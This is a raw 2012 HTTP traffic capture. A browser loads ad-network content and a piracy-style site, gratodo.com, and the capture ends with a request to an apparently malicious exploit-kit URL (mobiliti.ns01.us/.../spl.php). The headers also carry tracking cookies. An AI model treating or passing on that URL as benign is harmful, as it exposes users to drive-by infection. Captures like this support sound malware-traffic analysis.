Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FV*Okf*):kb10I3^brp/1&gt;DB*!PqDP''g8A?hhNdw=pdKK-.YHjHIq'kicP*S/t`; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..; acb811934=-@L6DKU&gt;mMDkh[4U5lrgrk=:c?enc=P4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAgUCAQUAAIIAfiVdNAAAAAA.&amp;tt_code=2565664&amp;cnd=%21OyHl1QjWrwIQis9mGAAgk4EDMAA457YHQABItQJQxbENWABg2AZoAHAAeACAAYwJiAEAkAEBmAEBoAEBqAEDsAEAuQFTGwP5sTX9P8EBUxsD-bE1_T_JAeK8rFAheQNA2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+6895%2C+1353121971%29%3Buf%28%27r%27%2C+1681290%2C+1353121971%29%3Bppv%288054%2C+%278505677865820771050%27%2C+1353121971%2C+1353726771%2C+38870%2C+49299%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgQeKAjWrwIQis9mGJOBAyAA&amp;vpid=45&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:53 GMT; domain=.adnxs.com; HttpOnly acb811934=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`Ei'+z_7[%P_/h9oD#-de9z8o84MY*/dZd@?%OfJ`9QQoY]&gt;5y9nKjfL7(K(?a%Qhv'kpU5+R.Vv; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly
Date: Sat, 17 Nov 2012 03:12:53 GMT
Content-Length: 5623
GET /mapuid?member=181&user= HTTP/1.1

Host: adx.adnxs.com
GET /mapuid?member=181&amp;user= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FV*Okf*):kb10I3^brp/1&gt;DB*!PqDP''g8A?hhNdw=pdKK-.YHjHIq'kicP*S/t`; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..; acb811934=-@L6DKU&gt;mMDkh[4U5lrgrk=:c?enc=P4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAgUCAQUAAIIAfiVdNAAAAAA.&amp;tt_code=2565664&amp;cnd=%21OyHl1QjWrwIQis9mGAAgk4EDMAA457YHQABItQJQxbENWABg2AZoAHAAeACAAYwJiAEAkAEBmAEBoAEBqAEDsAEAuQFTGwP5sTX9P8EBUxsD-bE1_T_JAeK8rFAheQNA2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+6895%2C+1353121971%29%3Buf%28%27r%27%2C+1681290%2C+1353121971%29%3Bppv%288054%2C+%278505677865820771050%27%2C+1353121971%2C+1353726771%2C+38870%2C+49299%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgQeKAjWrwIQis9mGJOBAyAA&amp;vpid=45&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:53 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Sat, 17 Nov 2012 03:12:53 GMT
GET /p/5f/43/21/b2/5f4321b2ed91a60daf41402017adc5d7.swf?clickTAG=http%3A%2F%2Fib.adnxs.com%2Fclick%3FP4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAQUCAQUAAIIAfSVMNAAAAAA.%2Fcnd%3D%2521rgQeKAjWrwIQis9mGJOBAyAA%2Fclickenc%3Dhttp%253A%252F%252Fwww.kaseya.com%252Flps%252Fen%252Fppc%252Fit-departments.aspx%253Futm_campaign%253D70170000000Ta79 HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=541&amp;width=120&amp;height=600&amp;pb=150&amp;cb=1353121973&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`Ei'+z_7[%P_/h9oD#-de9z8o84MY*/dZd@?%OfJ`9QQoY]&gt;5y9nKjfL7(K(?a%Qhv'kpU5+R.Vv; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: Apache
Etag: &quot;5f4321b2ed91a60daf41402017adc5d7:1332266116&quot;
Last-Modified: Tue, 20 Mar 2012 17:55:09 GMT
Accept-Ranges: bytes
Content-Length: 9781
Date: Sat, 17 Nov 2012 03:12:53 GMT
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Wed, 14 Nov 2012 22:43:37 GMT
Expires: Wed, 21 Nov 2012 22:43:37 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=415844, public, no-transform, must-revalidate
Date: Sat, 17 Nov 2012 03:12:53 GMT
nncoection: close
Connection: Keep-Alive
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&amp;nwid=10000602235&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=541&amp;width=120&amp;height=600&amp;pb=150&amp;cb=1353121973&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: BX=80telqh8ae05k&amp;b=3&amp;s=1t&amp;t=321; uid=uid=ad0630da-3064-11e2-9888-a396e8c8ae1a&amp;_hmacv=1&amp;_salt=3611729391&amp;_keyid=k1&amp;_hmac=b48ff5b41845cbe399ebcb2c321400026bb8dbbb; RMBX=80telqh8ae05k&amp;b=3&amp;s=1t&amp;t=321
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Nov 2012 03:12:53 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://ib.adnxs.com/ymapuid?xid=OsKdhgpxsaUNobakpYF9XuB8
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /ymapuid?xid=OsKdhgpxsaUNobakpYF9XuB8 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=541&amp;width=120&amp;height=600&amp;pb=150&amp;cb=1353121973&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`Ei'+z_7[%P_/h9oD#-de9z8o84MY*/dZd@?%OfJ`9QQoY]&gt;5y9nKjfL7(K(?a%Qhv'kpU5+R.Vv; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..
HTTP/1.1 200 OK

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:53 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly
Date: Sat, 17 Nov 2012 03:12:53 GMT
Content-Length: 0
GET /fr/u.php?p=391363987594223&m=5858721859426781856 HTTP/1.1

Host: www.facebook.com
GET /fr/u.php?p=391363987594223&amp;m=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=541&amp;width=468&amp;height=60&amp;pb=140&amp;cb=1353121972&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: public, max-age=0
Date: Fri, 16 Nov 2012 19:12:54 PST
Expires: Fri, 16 Nov 2012 19:12:54 PST
Pragma: public
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
X-FB-Debug: QLYvyHmbTD6sWkvpWjzydUxs/TtLjDlT9BK9/oLFWcU=
Transfer-Encoding: chunked
Connection: keep-alive
GET /favicon.ico HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __utma=165203049.525879842.1353121973.1353121973.1353121973.1; __utmb=165203049.2.10.1353121973; __utmc=165203049; __utmz=165203049.1353121973.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Sat, 17 Nov 2012 03:12:54 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Content-Length: 0
Keep-Alive: timeout=20, max=200
Connection: Keep-Alive
GET /pro-evolution-soccer-2012-psp2-linksespanol HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
X-Moz: prefetch
Cookie: __utma=165203049.525879842.1353121973.1353121973.1353121973.1; __utmb=165203049.2.10.1353121973; __utmc=165203049; __utmz=165203049.1353121973.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Nov 2012 03:12:54 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Keep-Alive: timeout=20, max=194
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __utma=165203049.525879842.1353121973.1353121973.1353121973.1; __utmb=165203049.2.10.1353121973; __utmc=165203049; __utmz=165203049.1353121973.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Sat, 17 Nov 2012 03:12:57 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Content-Length: 0
Keep-Alive: timeout=20, max=199
Connection: Keep-Alive
GET /images/misc/pwd2.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://gratodo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 17 Nov 2012 03:12:52 GMT
Keep-Alive: timeout=20, max=197
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /images/misc/pwd3.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://gratodo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 17 Nov 2012 03:12:53 GMT
Keep-Alive: timeout=20, max=197
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /images/misc/pwd5.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://gratodo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 17 Nov 2012 03:12:52 GMT
Keep-Alive: timeout=20, max=197
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /my241011/fdc5db4892d34fcef91c75bd12d9a5ac/spl.php HTTP/1.1

Host: mobiliti.ns01.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal